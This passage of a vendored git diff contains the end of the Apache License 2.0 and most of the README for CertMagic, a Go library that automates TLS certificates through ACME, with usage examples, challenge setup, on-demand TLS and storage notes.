this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
(except as stated in this section) patent license to make, have made,
|
||||
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||
where such license applies only to those patent claims licensable
|
||||
by such Contributor that are necessarily infringed by their
|
||||
Contribution(s) alone or by combination of their Contribution(s)
|
||||
with the Work to which such Contribution(s) was submitted. If You
|
||||
institute patent litigation against any entity (including a
|
||||
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||
or a Contribution incorporated within the Work constitutes direct
|
||||
or contributory patent infringement, then any patent licenses
|
||||
granted to You under this License for that Work shall terminate
|
||||
as of the date such litigation is filed.
|
||||
|
||||
4. Redistribution. You may reproduce and distribute copies of the
|
||||
Work or Derivative Works thereof in any medium, with or without
|
||||
modifications, and in Source or Object form, provided that You
|
||||
meet the following conditions:
|
||||
|
||||
(a) You must give any other recipients of the Work or
|
||||
Derivative Works a copy of this License; and
|
||||
|
||||
(b) You must cause any modified files to carry prominent notices
|
||||
stating that You changed the files; and
|
||||
|
||||
(c) You must retain, in the Source form of any Derivative Works
|
||||
that You distribute, all copyright, patent, trademark, and
|
||||
attribution notices from the Source form of the Work,
|
||||
excluding those notices that do not pertain to any part of
|
||||
the Derivative Works; and
|
||||
|
||||
(d) If the Work includes a "NOTICE" text file as part of its
|
||||
distribution, then any Derivative Works that You distribute must
|
||||
include a readable copy of the attribution notices contained
|
||||
within such NOTICE file, excluding those notices that do not
|
||||
pertain to any part of the Derivative Works, in at least one
|
||||
of the following places: within a NOTICE text file distributed
|
||||
as part of the Derivative Works; within the Source form or
|
||||
documentation, if provided along with the Derivative Works; or,
|
||||
within a display generated by the Derivative Works, if and
|
||||
wherever such third-party notices normally appear. The contents
|
||||
of the NOTICE file are for informational purposes only and
|
||||
do not modify the License. You may add Your own attribution
|
||||
notices within Derivative Works that You distribute, alongside
|
||||
or as an addendum to the NOTICE text from the Work, provided
|
||||
that such additional attribution notices cannot be construed
|
||||
as modifying the License.
|
||||
|
||||
You may add Your own copyright statement to Your modifications and
|
||||
may provide additional or different license terms and conditions
|
||||
for use, reproduction, or distribution of Your modifications, or
|
||||
for any such Derivative Works as a whole, provided Your use,
|
||||
reproduction, and distribution of the Work otherwise complies with
|
||||
the conditions stated in this License.
|
||||
|
||||
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||
any Contribution intentionally submitted for inclusion in the Work
|
||||
by You to the Licensor shall be under the terms and conditions of
|
||||
this License, without any additional terms or conditions.
|
||||
Notwithstanding the above, nothing herein shall supersede or modify
|
||||
the terms of any separate license agreement you may have executed
|
||||
with Licensor regarding such Contributions.
|
||||
|
||||
6. Trademarks. This License does not grant permission to use the trade
|
||||
names, trademarks, service marks, or product names of the Licensor,
|
||||
except as required for reasonable and customary use in describing the
|
||||
origin of the Work and reproducing the content of the NOTICE file.
|
||||
|
||||
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||
agreed to in writing, Licensor provides the Work (and each
|
||||
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||
implied, including, without limitation, any warranties or conditions
|
||||
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||
appropriateness of using or redistributing the Work and assume any
|
||||
risks associated with Your exercise of permissions under this License.
|
||||
|
||||
8. Limitation of Liability. In no event and under no legal theory,
|
||||
whether in tort (including negligence), contract, or otherwise,
|
||||
unless required by applicable law (such as deliberate and grossly
|
||||
negligent acts) or agreed to in writing, shall any Contributor be
|
||||
liable to You for damages, including any direct, indirect, special,
|
||||
incidental, or consequential damages of any character arising as a
|
||||
result of this License or out of the use or inability to use the
|
||||
Work (including but not limited to damages for loss of goodwill,
|
||||
work stoppage, computer failure or malfunction, or any and all
|
||||
other commercial damages or losses), even if such Contributor
|
||||
has been advised of the possibility of such damages.
|
||||
|
||||
9. Accepting Warranty or Additional Liability. While redistributing
|
||||
the Work or Derivative Works thereof, You may choose to offer,
|
||||
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||
or other liability obligations and/or rights consistent with this
|
||||
License. However, in accepting such obligations, You may act only
|
||||
on Your own behalf and on Your sole responsibility, not on behalf
|
||||
of any other Contributor, and only if You agree to indemnify,
|
||||
defend, and hold each Contributor harmless for any liability
|
||||
incurred by, or claims asserted against, such Contributor by reason
|
||||
of your accepting any such warranty or additional liability.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
APPENDIX: How to apply the Apache License to your work.
|
||||
|
||||
To apply the Apache License to your work, attach the following
|
||||
boilerplate notice, with the fields enclosed by brackets "{}"
|
||||
replaced with your own identifying information. (Don't include
|
||||
the brackets!) The text should be enclosed in the appropriate
|
||||
comment syntax for the file format. We also recommend that a
|
||||
file or class name and description of purpose be included on the
|
||||
same "printed page" as the copyright notice for easier
|
||||
identification within third-party archives.
|
||||
|
||||
Copyright {yyyy} {name of copyright owner}
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
526
vendor/github.com/caddyserver/certmagic/README.md
generated
vendored
Normal file
@ -0,0 +1,526 @@
|
||||
<p align="center">
|
||||
<a href="https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc"><img src="https://user-images.githubusercontent.com/1128849/49704830-49d37200-fbd5-11e8-8385-767e0cd033c3.png" alt="CertMagic" width="550"></a>
|
||||
</p>
|
||||
<h3 align="center">Easy and Powerful TLS Automation</h3>
|
||||
<p align="center">The same library used by the <a href="https://caddyserver.com">Caddy Web Server</a></p>
|
||||
<p align="center">
|
||||
<a href="https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc"><img src="https://img.shields.io/badge/godoc-reference-blue.svg"></a>
|
||||
<a href="https://github.com/caddyserver/certmagic/actions?query=workflow%3ATests"><img src="https://github.com/caddyserver/certmagic/workflows/Tests/badge.svg"></a>
|
||||
<a href="https://sourcegraph.com/github.com/caddyserver/certmagic?badge"><img src="https://sourcegraph.com/github.com/caddyserver/certmagic/-/badge.svg"></a>
|
||||
</p>
|
||||
|
||||
|
||||
Caddy's [automagic TLS features](https://caddyserver.com/docs/automatic-https)—now for your own Go programs—in one powerful and easy-to-use library!
|
||||
|
||||
CertMagic is the most mature, robust, and powerful ACME client integration for Go... and perhaps ever.
|
||||
|
||||
With CertMagic, you can add one line to your Go application to serve securely over TLS, without ever having to touch certificates.
|
||||
|
||||
Instead of:
|
||||
|
||||
```go
|
||||
// plaintext HTTP, gross 🤢
|
||||
http.ListenAndServe(":80", mux)
|
||||
```
|
||||
|
||||
Use CertMagic:
|
||||
|
||||
```go
|
||||
// encrypted HTTPS with HTTP->HTTPS redirects - yay! 🔒😍
|
||||
certmagic.HTTPS([]string{"example.com"}, mux)
|
||||
```
|
||||
|
||||
That line of code will serve your HTTP router `mux` over HTTPS, complete with HTTP->HTTPS redirects. It obtains and renews the TLS certificates. It staples OCSP responses for greater privacy and security. As long as your domain name points to your server, CertMagic will keep its connections secure.
|
||||
|
||||
Compared to other ACME client libraries for Go, only CertMagic supports the full suite of ACME features, and no other library matches CertMagic's maturity and reliability.
|
||||
|
||||
|
||||
|
||||
|
||||
CertMagic - Automatic HTTPS using Let's Encrypt
|
||||
===============================================
|
||||
|
||||
## Menu
|
||||
|
||||
- [Features](#features)
|
||||
- [Requirements](#requirements)
|
||||
- [Installation](#installation)
|
||||
- [Usage](#usage)
|
||||
- [Package Overview](#package-overview)
|
||||
- [Certificate authority](#certificate-authority)
|
||||
- [The `Config` type](#the-config-type)
|
||||
- [Defaults](#defaults)
|
||||
- [Providing an email address](#providing-an-email-address)
|
||||
- [Rate limiting](#rate-limiting)
|
||||
- [Development and testing](#development-and-testing)
|
||||
- [Examples](#examples)
|
||||
- [Serving HTTP handlers with HTTPS](#serving-http-handlers-with-https)
|
||||
- [Starting a TLS listener](#starting-a-tls-listener)
|
||||
- [Getting a tls.Config](#getting-a-tlsconfig)
|
||||
- [Advanced use](#advanced-use)
|
||||
- [Wildcard Certificates](#wildcard-certificates)
|
||||
- [Behind a load balancer (or in a cluster)](#behind-a-load-balancer-or-in-a-cluster)
|
||||
- [The ACME Challenges](#the-acme-challenges)
|
||||
- [HTTP Challenge](#http-challenge)
|
||||
- [TLS-ALPN Challenge](#tls-alpn-challenge)
|
||||
- [DNS Challenge](#dns-challenge)
|
||||
- [On-Demand TLS](#on-demand-tls)
|
||||
- [Storage](#storage)
|
||||
- [Cache](#cache)
|
||||
- [Contributing](#contributing)
|
||||
- [Project History](#project-history)
|
||||
- [Credits and License](#credits-and-license)
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- Fully automated certificate management including issuance and renewal
|
||||
- One-liner, fully managed HTTPS servers
|
||||
- Full control over almost every aspect of the system
|
||||
- HTTP->HTTPS redirects
|
||||
- Solves all 3 ACME challenges: HTTP, TLS-ALPN, and DNS
|
||||
- Most robust error handling of _any_ ACME client
|
||||
- Challenges are randomized to avoid accidental dependence
|
||||
- Challenges are rotated to overcome certain network blockages
|
||||
- Robust retries for up to 30 days
|
||||
- Exponential backoff with carefully-tuned intervals
|
||||
- Retries with optional test/staging CA endpoint instead of production, to avoid rate limits
|
||||
- Written in Go, a language with memory-safety guarantees
|
||||
- Powered by [ACMEz](https://github.com/mholt/acmez), _the_ premier ACME client library for Go
|
||||
- All [libdns](https://github.com/libdns) DNS providers work out-of-the-box
|
||||
- Pluggable storage implementations (default: file system)
|
||||
- Wildcard certificates
|
||||
- Automatic OCSP stapling ([done right](https://gist.github.com/sleevi/5efe9ef98961ecfb4da8#gistcomment-2336055)) [keeps your sites online!](https://twitter.com/caddyserver/status/1234874273724084226)
|
||||
- Will [automatically attempt](https://twitter.com/mholt6/status/1235577699541762048) to replace [revoked certificates](https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591/3?u=mholt)!
|
||||
- Staples stored to disk in case of responder outages
|
||||
- Distributed solving of all challenges (works behind load balancers)
|
||||
- Highly efficient, coordinated management in a fleet
|
||||
- Active locking
|
||||
- Smart queueing
|
||||
- Supports "on-demand" issuance of certificates (during TLS handshakes!)
|
||||
- Caddy / CertMagic pioneered this technology
|
||||
- Custom decision functions to regulate and throttle on-demand behavior
|
||||
- Optional event hooks for observation
|
||||
- Works with any certificate authority (CA) compliant with the ACME specification
|
||||
- Certificate revocation (please, only if private key is compromised)
|
||||
- Must-Staple (optional; not default)
|
||||
- Cross-platform support! Mac, Windows, Linux, BSD, Android...
|
||||
- Scales to hundreds of thousands of names/certificates per instance
|
||||
- Use in conjunction with your own certificates
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
0. ACME server (can be a publicly-trusted CA, or your own)
|
||||
1. Public DNS name(s) you control
|
||||
2. Server reachable from public Internet
|
||||
- Or use the DNS challenge to waive this requirement
|
||||
3. Control over port 80 (HTTP) and/or 443 (HTTPS)
|
||||
- Or they can be forwarded to other ports you control
|
||||
- Or use the DNS challenge to waive this requirement
|
||||
- (This is a requirement of the ACME protocol, not a library limitation)
|
||||
4. Persistent storage
|
||||
- Typically the local file system (default)
|
||||
- Other integrations available/possible
|
||||
|
||||
**_Before using this library, your domain names MUST be pointed (A/AAAA records) at your server (unless you use the DNS challenge)!_**
|
||||
|
||||
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
$ go get github.com/caddyserver/certmagic
|
||||
```
|
||||
|
||||
|
||||
## Usage
|
||||
|
||||
### Package Overview
|
||||
|
||||
#### Certificate authority
|
||||
|
||||
This library uses Let's Encrypt by default, but you can use any certificate authority that conforms to the ACME specification. Known/common CAs are provided as consts in the package, for example `LetsEncryptStagingCA` and `LetsEncryptProductionCA`.
|
||||
|
||||
#### The `Config` type
|
||||
|
||||
The `certmagic.Config` struct is how you can wield the power of this fully armed and operational battle station. However, an empty/uninitialized `Config` is _not_ a valid one! In time, you will learn to use the force of `certmagic.NewDefault()` as I have.
|
||||
|
||||
#### Defaults
|
||||
|
||||
The default `Config` value is called `certmagic.Default`. Change its fields to suit your needs, then call `certmagic.NewDefault()` when you need a valid `Config` value. In other words, `certmagic.Default` is a template and is not valid for use directly.
|
||||
|
||||
You can set the default values easily, for example: `certmagic.Default.Issuer = ...`.
|
||||
|
||||
Similarly, to configure ACME-specific defaults, use `certmagic.DefaultACME`.
|
||||
|
||||
The high-level functions in this package (`HTTPS()`, `Listen()`, `ManageSync()`, and `ManageAsync()`) use the default config exclusively. This is how most of you will interact with the package. This is suitable when all your certificates are managed the same way. However, if you need to manage certificates differently depending on their name, you will need to make your own cache and configs (keep reading).
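As a quick illustration of the template-then-materialize pattern described above, here is a minimal sketch (the email address is a placeholder, not a library default):

```go
// Adjust the package-level templates first; these are only templates,
// not valid Configs on their own.
certmagic.DefaultACME.Email = "you@example.com" // placeholder address
certmagic.DefaultACME.Agreed = true

// Then materialize a valid Config that inherits those defaults.
cfg := certmagic.NewDefault()

// cfg is now ready to use, e.g. for a TLS listener:
tlsConfig := cfg.TLSConfig()
_ = tlsConfig
```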
|
||||
|
||||
|
||||
#### Providing an email address
|
||||
|
||||
Although not strictly required, this is highly recommended best practice. It allows you to receive expiration emails if your certificates are expiring for some reason, and also allows the CA's engineers to potentially get in touch with you if something is wrong. I recommend setting `certmagic.DefaultACME.Email` or always setting the `Email` field of a new `Config` struct.
|
||||
|
||||
|
||||
#### Rate limiting
|
||||
|
||||
To avoid firehosing the CA's servers, CertMagic has built-in rate limiting. Currently, its default limit is up to 10 transactions (obtain or renew) every 1 minute (sliding window). This can be changed by setting the `RateLimitEvents` and `RateLimitEventsWindow` variables, if desired.
|
||||
|
||||
The CA may still enforce their own rate limits, and there's nothing (well, nothing ethical) CertMagic can do to bypass them for you.
|
||||
|
||||
Additionally, CertMagic will retry failed validations with exponential backoff for up to 30 days, with a reasonable maximum interval between attempts (an "attempt" means trying each enabled challenge type once).
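A minimal sketch of loosening that throttle, assuming the package-level `RateLimitEvents` and `RateLimitEventsWindow` variables mentioned above (the values here are arbitrary; requires the standard `time` package):

```go
// Allow up to 20 obtain/renew transactions per 2-minute sliding window.
certmagic.RateLimitEvents = 20
certmagic.RateLimitEventsWindow = 2 * time.Minute
```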
|
||||
|
||||
|
||||
### Development and Testing
|
||||
|
||||
Note that Let's Encrypt imposes [strict rate limits](https://letsencrypt.org/docs/rate-limits/) at its production endpoint, so using it while developing your application may lock you out for a few days if you aren't careful!
|
||||
|
||||
While developing and testing your application, use [their staging endpoint](https://letsencrypt.org/docs/staging-environment/), which has much higher rate limits. Even then, don't hammer it; it's simply much safer for testing. When deploying, though, use their production CA, because their staging CA doesn't issue trusted certificates.
|
||||
|
||||
To use staging, set `certmagic.DefaultACME.CA = certmagic.LetsEncryptStagingCA` or set `CA` of every `ACMEIssuer` struct.
|
||||
|
||||
|
||||
|
||||
### Examples
|
||||
|
||||
There are many ways to use this library. We'll start with the highest-level (simplest) and work down (more control).
|
||||
|
||||
All these high-level examples use `certmagic.Default` and `certmagic.DefaultACME` for the config and the default cache and storage for serving up certificates.
|
||||
|
||||
First, we'll follow best practices and do the following:
|
||||
|
||||
```go
|
||||
// read and agree to your CA's legal documents
|
||||
certmagic.DefaultACME.Agreed = true
|
||||
|
||||
// provide an email address
|
||||
certmagic.DefaultACME.Email = "you@yours.com"
|
||||
|
||||
// use the staging endpoint while we're developing
|
||||
certmagic.DefaultACME.CA = certmagic.LetsEncryptStagingCA
|
||||
```
|
||||
|
||||
For fully-functional program examples, check out [this Twitter thread](https://twitter.com/mholt6/status/1073103805112147968) (or read it [unrolled into a single post](https://threadreaderapp.com/thread/1073103805112147968.html)). (Note that the package API has changed slightly since these posts.)
|
||||
|
||||
|
||||
#### Serving HTTP handlers with HTTPS
|
||||
|
||||
```go
|
||||
err := certmagic.HTTPS([]string{"example.com", "www.example.com"}, mux)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
This starts HTTP and HTTPS listeners and redirects HTTP to HTTPS!
|
||||
|
||||
#### Starting a TLS listener
|
||||
|
||||
```go
|
||||
ln, err := certmagic.Listen([]string{"example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
#### Getting a tls.Config
|
||||
|
||||
```go
|
||||
tlsConfig, err := certmagic.TLS([]string{"example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
#### Advanced use
|
||||
|
||||
For more control (particularly, if you need a different way of managing each certificate), you'll make and use a `Cache` and a `Config` like so:
|
||||
|
||||
```go
|
||||
cache := certmagic.NewCache(certmagic.CacheOptions{
|
||||
GetConfigForCert: func(cert certmagic.Certificate) (*certmagic.Config, error) {
|
||||
// do whatever you need to do to get the right
|
||||
// configuration for this certificate; keep in
|
||||
// mind that this config value is used as a
|
||||
// template, and will be completed with any
|
||||
// defaults that are set in the Default config
|
||||
return &certmagic.Config{
|
||||
// ...
|
||||
}, nil
|
||||
},
|
||||
...
|
||||
})
|
||||
|
||||
magic := certmagic.New(cache, certmagic.Config{
|
||||
// any customizations you need go here
|
||||
})
|
||||
|
||||
myACME := certmagic.NewACMEIssuer(magic, certmagic.ACMEIssuer{
|
||||
CA: certmagic.LetsEncryptStagingCA,
|
||||
Email: "you@yours.com",
|
||||
Agreed: true,
|
||||
// plus any other customizations you need
|
||||
})
|
||||
|
||||
magic.Issuer = myACME
|
||||
|
||||
// this obtains certificates or renews them if necessary
|
||||
err := magic.ManageSync(context.TODO(), []string{"example.com", "sub.example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// to use its certificates and solve the TLS-ALPN challenge,
|
||||
// you can get a TLS config to use in a TLS listener!
|
||||
tlsConfig := magic.TLSConfig()
|
||||
|
||||
// be sure to customize NextProtos if serving a specific
|
||||
// application protocol after the TLS handshake, for example:
|
||||
tlsConfig.NextProtos = append([]string{"h2", "http/1.1"}, tlsConfig.NextProtos...)
|
||||
|
||||
//// OR ////
|
||||
|
||||
// if you already have a TLS config you don't want to replace,
|
||||
// we can simply set its GetCertificate field and append the
|
||||
// TLS-ALPN challenge protocol to the NextProtos
|
||||
myTLSConfig.GetCertificate = magic.GetCertificate
|
||||
myTLSConfig.NextProtos = append(myTLSConfig.NextProtos, tlsalpn01.ACMETLS1Protocol)
|
||||
|
||||
// the HTTP challenge has to be handled by your HTTP server;
|
||||
// if you don't have one, you should have disabled it earlier
|
||||
// when you made the certmagic.Config
|
||||
httpMux = myACME.HTTPChallengeHandler(httpMux)
|
||||
```
|
||||
|
||||
Great! This example grants you much more flexibility for advanced programs. However, _the vast majority of you will only use the high-level functions described earlier_, especially since you can still customize them by setting the package-level `Default` config.
|
||||
|
||||
|
||||
### Wildcard certificates
|
||||
|
||||
At time of writing (December 2018), Let's Encrypt only issues wildcard certificates with the DNS challenge. You can easily enable the DNS challenge with CertMagic for numerous providers (see the relevant section in the docs).
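For example, once a DNS solver is configured (see the DNS Challenge section below), wildcard names can be passed to the high-level functions like any other name; a minimal sketch:

```go
// Assumes certmagic.DefaultACME.DNS01Solver has already been set
// (see the DNS Challenge section below); Let's Encrypt issues the
// wildcard only via the DNS challenge.
err := certmagic.HTTPS([]string{"example.com", "*.example.com"}, mux)
if err != nil {
	return err
}
```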
|
||||
|
||||
|
||||
### Behind a load balancer (or in a cluster)
|
||||
|
||||
CertMagic runs effectively behind load balancers and/or in cluster/fleet environments. In other words, you can have 10 or 1,000 servers all serving the same domain names, all sharing certificates and OCSP staples.
|
||||
|
||||
To do so, simply ensure that each instance is using the same Storage. That is the sole criteria for determining whether an instance is part of a cluster.
|
||||
|
||||
The default Storage is implemented using the file system, so mounting the same shared folder is sufficient (see [Storage](#storage) for more on that)! If you need an alternate Storage implementation, feel free to use one, provided that all the instances use the _same_ one. :)
|
||||
|
||||
See [Storage](#storage) and the associated [pkg.go.dev](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Storage) for more information!
|
||||
|
||||
|
||||
## The ACME Challenges
|
||||
|
||||
This section describes how to solve the ACME challenges. Challenges are how you demonstrate to the certificate authority some control over your domain name, thus authorizing them to grant you a certificate for that name. [The great innovation of ACME](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme) is that verification by CAs can now be automated, rather than having to click links in emails (who ever thought that was a good idea??).
|
||||
|
||||
If you're using the high-level convenience functions like `HTTPS()`, `Listen()`, or `TLS()`, the HTTP and/or TLS-ALPN challenges are solved for you because they also start listeners. However, if you're making a `Config` and you start your own server manually, you'll need to be sure the ACME challenges can be solved so certificates can be renewed.
|
||||
|
||||
The HTTP and TLS-ALPN challenges are the defaults because they don't require configuration from you, but they require that your server is accessible from external IPs on low ports. If that is not possible in your situation, you can enable the DNS challenge, which will disable the HTTP and TLS-ALPN challenges and use the DNS challenge exclusively.
|
||||
|
||||
Technically, only one challenge needs to be enabled for things to work, but using multiple is good for reliability in case a challenge is discontinued by the CA. This happened to the TLS-SNI challenge in early 2018—many popular ACME clients such as Traefik and Autocert broke, resulting in downtime for some sites, until new releases were made and patches deployed, because they used only one challenge; Caddy, however—this library's forerunner—was unaffected because it also used the HTTP challenge. If multiple challenges are enabled, they are chosen randomly to help prevent false reliance on a single challenge type. And if one fails, any remaining enabled challenges are tried before giving up.
|
||||
|
||||
|
||||
### HTTP Challenge
|
||||
|
||||
Per the ACME spec, the HTTP challenge requires port 80, or at least packet forwarding from port 80. It works by serving a specific HTTP response that only the genuine server would have to a normal HTTP request at a special endpoint.
|
||||
|
||||
If you are running an HTTP server, solving this challenge is very easy: just wrap your handler in `HTTPChallengeHandler` _or_ call `SolveHTTPChallenge()` inside your own `ServeHTTP()` method.
|
||||
|
||||
For example, if you're using the standard library:
|
||||
|
||||
```go
|
||||
mux := http.NewServeMux()
|
||||
mux.HandleFunc("/", func(w http.ResponseWriter, req *http.Request) {
|
||||
fmt.Fprintf(w, "Lookit my cool website over HTTPS!")
|
||||
})
|
||||
|
||||
http.ListenAndServe(":80", myACME.HTTPChallengeHandler(mux))
|
||||
```
|
||||
|
||||
If wrapping your handler is not a good solution, try this inside your `ServeHTTP()` instead:
|
||||
|
||||
```go
|
||||
magic := certmagic.NewDefault()
|
||||
myACME := certmagic.NewACMEIssuer(magic, certmagic.DefaultACME)
|
||||
|
||||
func ServeHTTP(w http.ResponseWriter, req *http.Request) {
|
||||
if myACME.HandleHTTPChallenge(w, req) {
|
||||
return // challenge handled; nothing else to do
|
||||
}
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
If you are not running an HTTP server, you should disable the HTTP challenge _or_ run an HTTP server whose sole job it is to solve the HTTP challenge.
|
||||
|
||||
|
||||
### TLS-ALPN Challenge
|
||||
|
||||
Per the ACME spec, the TLS-ALPN challenge requires port 443, or at least packet forwarding from port 443. It works by providing a special certificate using a standard TLS extension, Application Layer Protocol Negotiation (ALPN), having a special value. This is the most convenient challenge type because it usually requires no extra configuration and uses the standard TLS port which is where the certificates are used, also.
|
||||
|
||||
This challenge is easy to solve: just use the provided `tls.Config` when you make your TLS listener:
|
||||
|
||||
```go
|
||||
// use this to configure a TLS listener
|
||||
tlsConfig := magic.TLSConfig()
|
||||
```
|
||||
|
||||
Or make two simple changes to an existing `tls.Config`:
|
||||
|
||||
```go
|
||||
myTLSConfig.GetCertificate = magic.GetCertificate
|
||||
myTLSConfig.NextProtos = append(myTLSConfig.NextProtos, tlsalpn01.ACMETLS1Protocol)
|
||||
```
|
||||
|
||||
Then just make sure your TLS listener is listening on port 443:
|
||||
|
||||
```go
|
||||
ln, err := tls.Listen("tcp", ":443", myTLSConfig)
|
||||
```
|
||||
|
||||
|
||||
### DNS Challenge
|
||||
|
||||
The DNS challenge is perhaps the most useful challenge because it allows you to obtain certificates without your server needing to be publicly accessible on the Internet, and it's the only challenge by which Let's Encrypt will issue wildcard certificates.
|
||||
|
||||
This challenge works by setting a special record in the domain's zone. To do this automatically, your DNS provider needs to offer an API by which changes can be made to domain names, and the changes need to take effect immediately for best results. CertMagic supports [all DNS providers with `libdns` implementations](https://github.com/libdns)! It always cleans up the temporary record after the challenge completes.
|
||||
|
||||
To enable it, just set the `DNS01Solver` field on a `certmagic.ACMEIssuer` struct, or set the default `certmagic.ACMEIssuer.DNS01Solver` variable. For example, if my domains' DNS was served by Cloudflare:
|
||||
|
||||
```go
|
||||
import "github.com/libdns/cloudflare"
|
||||
|
||||
certmagic.DefaultACME.DNS01Solver = &certmagic.DNS01Solver{
|
||||
DNSProvider: &cloudflare.Provider{
|
||||
APIToken: "topsecret",
|
||||
},
|
||||
}
|
||||
```
|
||||
|
||||
Now the DNS challenge will be used by default, and I can obtain certificates for wildcard domains, too. Enabling the DNS challenge disables the other challenges for that `certmagic.ACMEIssuer` instance.
|
||||
|
||||
|
||||
## On-Demand TLS
|
||||
|
||||
Normally, certificates are obtained and renewed before a listener starts serving, and then those certificates are maintained throughout the lifetime of the program. In other words, the certificate names are static. But sometimes you don't know all the names ahead of time, or you don't want to manage all the certificates up front. This is where On-Demand TLS shines.
|
||||
|
||||
Originally invented for use in Caddy (which was the first program to use such technology), On-Demand TLS makes it possible and easy to serve certificates for arbitrary or specific names during the lifetime of the server. When a TLS handshake is received, CertMagic will read the Server Name Indication (SNI) value and either load and present that certificate in the ServerHello, or if one does not exist, it will obtain it from a CA right then-and-there.
|
||||
|
||||
Of course, this has some obvious security implications. You don't want to DoS a CA or allow arbitrary clients to fill your storage with spammy TLS handshakes. That's why, when you enable On-Demand issuance, you should set limits or policy to allow getting certificates. CertMagic has an implicit whitelist built-in which is sufficient for nearly everyone, but also has a more advanced way to control on-demand issuance.
|
||||
|
||||
The simplest way to enable on-demand issuance is to set the OnDemand field of a Config (or the default package-level value):
|
||||
|
||||
```go
|
||||
certmagic.Default.OnDemand = new(certmagic.OnDemandConfig)
|
||||
```
|
||||
|
||||
By setting this to a non-nil value, on-demand TLS is enabled for that config. For convenient security, CertMagic's high-level abstraction functions such as `HTTPS()`, `TLS()`, `ManageSync()`, `ManageAsync()`, and `Listen()` (which all accept a list of domain names) will whitelist those names automatically so only certificates for those names can be obtained when using the Default config. Usually this is sufficient for most users.
|
||||
|
||||
However, if you require advanced control over which domains can be issued certificates on-demand (for example, if you do not know which domain names you are managing, or just need to defer their operations until later), you should implement your own DecisionFunc:
|
||||
|
||||
```go
|
||||
// if the decision function returns an error, a certificate
|
||||
// may not be obtained for that name at that time
|
||||
certmagic.Default.OnDemand = &certmagic.OnDemandConfig{
|
||||
DecisionFunc: func(name string) error {
|
||||
if name != "example.com" {
|
||||
return fmt.Errorf("not allowed")
|
||||
}
|
||||
return nil
|
||||
},
|
||||
}
|
||||
```
|
||||
|
||||
The [pkg.go.dev](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#OnDemandConfig) describes how to use this in full detail, so please check it out!
|
||||
|
||||
|
||||
## Storage
|
||||
|
||||
CertMagic relies on storage to store certificates and other TLS assets (OCSP staple cache, coordinating locks, etc). Persistent storage is a requirement when using CertMagic: ephemeral storage will likely lead to rate limiting on the CA-side as CertMagic will always have to get new certificates.
|
||||
|
||||
By default, CertMagic stores assets on the local file system in `$HOME/.local/share/certmagic` (and honors `$XDG_DATA_HOME` if set). CertMagic will create the directory if it does not exist. If writes are denied, things will not be happy, so make sure CertMagic can write to it!
|
||||
|
||||
The notion of a "cluster" or "fleet" of instances that may be serving the same site and sharing certificates, etc, is tied to storage. Simply, any instances that use the same storage facilities are considered part of the cluster. So if you deploy 100 instances of CertMagic behind a load balancer, they are all part of the same cluster if they share the same storage configuration. Sharing storage could be mounting a shared folder, or implementing some other distributed storage system such as a database server or KV store.
|
||||
|
||||
The easiest way to change the storage being used is to set `certmagic.DefaultStorage` to a value that satisfies the [Storage interface](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Storage). Keep in mind that a valid `Storage` must be able to implement some operations atomically in order to provide locking and synchronization.
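For the common case of a shared file system, a minimal sketch is to point the default storage at the shared location before creating any configs (the mount path here is a placeholder; this sets the `Storage` field on the package default `Config` used by the high-level functions):

```go
// Every instance pointing at the same storage shares certificates,
// OCSP staples, and locks; the path below is just a placeholder.
certmagic.Default.Storage = &certmagic.FileStorage{Path: "/mnt/shared/certmagic"}
```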
|
||||
|
||||
If you write a Storage implementation, please add it to the [project wiki](https://github.com/caddyserver/certmagic/wiki/Storage-Implementations) so people can find it!
|
||||
|
||||
|
||||
## Cache
|
||||
|
||||
All of the certificates in use are de-duplicated and cached in memory for optimal performance at handshake-time. This cache must be backed by persistent storage as described above.
|
||||
|
||||
Most applications will not need to interact with certificate caches directly. Usually, the closest you will come is to set the package-wide `certmagic.DefaultStorage` variable (before attempting to create any Configs). However, if your use case requires using different storage facilities for different Configs (that's highly unlikely and NOT recommended! Even Caddy doesn't get that crazy), you will need to call `certmagic.NewCache()` and pass in the storage you want to use, then get new `Config` structs with `certmagic.NewWithCache()` and pass in the cache.
|
||||
|
||||
Again, if you're needing to do this, you've probably over-complicated your application design.
|
||||
|
||||
|
||||
## FAQ
|
||||
|
||||
### Can I use some of my own certificates while using CertMagic?
|
||||
|
||||
Yes, just call the relevant method on the `Config` to add your own certificate to the cache:
|
||||
|
||||
